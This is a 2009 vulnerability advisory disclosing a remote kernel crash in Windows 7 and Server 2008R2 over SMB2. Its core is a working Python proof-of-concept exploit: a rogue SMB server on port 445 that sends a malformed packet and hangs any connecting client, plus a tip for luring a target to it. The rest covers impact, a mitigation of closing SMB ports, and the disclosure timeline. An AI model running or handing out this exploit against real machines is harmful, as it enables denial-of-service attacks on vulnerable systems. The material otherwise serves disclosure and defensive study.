Windows 7 Remote Kernel Crash

`=============================================  
- Release date: November 11th, 2009  
- Discovered by: Laurent Gaffié  
- Severity: Medium/High  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Windows 7 * , Server 2008R2 Remote Kernel Crash  
  
II. BACKGROUND  
-------------------------  
#FAIL,#FAIL,#FAIL  
SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn.  
#FAIL,#FAIL,#FAIL  
  
III. DESCRIPTION  
-------------------------  
See : http://g-laurent.blogspot.com/ for much more details  
  
#Comment: This bug is specific Windows 7/2008R2.  
  
IV. PROOF OF CONCEPT  
-------------------------  
#win7-crash.py:  
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)  
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure()  
caused by an infinite loop.  
#NO BSOD, YOU GOTTA PULL THE PLUG.  
#To trigger it fast from the target: \\this_script_ip_addr\BLAH , instantly  
crash  
#Author: Laurent Gaffié  
#  
  
import SocketServer  
  
packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..  
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"  
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"  
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"  
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"  
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"  
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"  
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"  
  
  
class SMB2(SocketServer.BaseRequestHandler):  
  
def handle(self):  
  
print "Who:", self.client_address  
input = self.request.recv(1024)  
self.request.send(packet)  
self.request.close()  
  
launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port  
445  
launch.serve_forever()  
  
#SDL FAILED  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can remotly crash any Windows 7/Server 2008R2.  
  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Windows 7, Windowns Server 2008R2  
  
VII. SOLUTION  
-------------------------  
No patch available for the moment, your vendor do not care.  
Close SMB feature and ports, until a real audit is provided.  
  
VIII. REFERENCES  
-------------------------  
http://blogs.msdn.com/sdl/  
http://g-laurent.blogspot.com/  
http://twitter.com/g_laurent  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered by Laurent Gaffié  
Laurent.gaffie{remove-this}(at)gmail.com  
  
X. REVISION HISTORY  
-------------------------  
November 8th, 2009: MSRC contacted  
November 8th, 2009: MSRC acknoledge the vuln  
November 11th, 2009: MRSC try to convince me that multi-vendor-ipv6 bug  
shouldn't appears on a security bulletin.  
November 11th, 2009: Win 7 remote kernel smash released  
  
XI. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
I accept no responsibility for any damage caused by the use or  
misuse of this information.  
  
XII.Personal Notes  
-------------------------  
More Remote Kernel FD @MS to come.  
`